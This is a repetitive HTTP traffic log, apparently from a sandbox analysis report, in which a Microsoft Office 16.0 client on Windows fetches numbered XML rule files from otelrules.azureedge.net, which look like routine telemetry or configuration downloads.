Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
